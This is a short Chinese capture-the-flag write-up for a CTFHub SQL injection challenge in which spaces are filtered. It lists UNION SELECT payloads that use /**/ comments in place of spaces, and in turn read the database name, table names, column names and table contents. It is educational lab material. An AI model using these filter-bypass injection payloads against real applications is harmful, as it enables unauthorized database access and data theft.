CTFHUB-SQL注入-过滤空格

目录

查询数据库名

查询数据库中的表

查询表中字段

查询表中数据


空格被过滤,使用 /**/ 绕过

查询数据库名

复制代码
-1/**/union/**/select/**/1,database()

查询数据库中的表

复制代码
-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()

查询表中字段

复制代码
-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='iweunwnolg'

查询表中数据

复制代码
-1/**/union/**/select/**/1,group_concat(abhijtmzdc)/**/from/**/iweunwnolg
相关推荐
vortex51 小时前
网络安全入门综述
安全·web安全·网络安全
noravinsc2 小时前
django admin AttributeError: ‘UserResorce‘ object has no attribute ‘ID‘
数据库·django·sqlite
智驱力人工智能2 小时前
夏季道路安全的AI革命:节省人力、提升效率
人工智能·安全·边缘计算·视觉算法·视觉分析·智能巡航·人工智能云计算
王有品4 小时前
Spring MVC 多个拦截器的执行顺序
数据库·spring·mvc
极小狐5 小时前
如何使用极狐GitLab 的外部状态检查功能?
数据库·ci/cd·gitlab·devops·mcp
Leo.yuan5 小时前
数据仓库建设全解析!
大数据·数据库·数据仓库·数据分析·spark
神经毒素5 小时前
WEB安全--社会工程--SET钓鱼网站
安全·web安全
闪电麦坤955 小时前
SQL:子查询(subqueries)
数据库·sql
活跃的煤矿打工人5 小时前
【星海出品】分布式存储数据库etcd
数据库·分布式·etcd
文牧之5 小时前
PostgreSQL的扩展 pgcrypto
运维·数据库·postgresql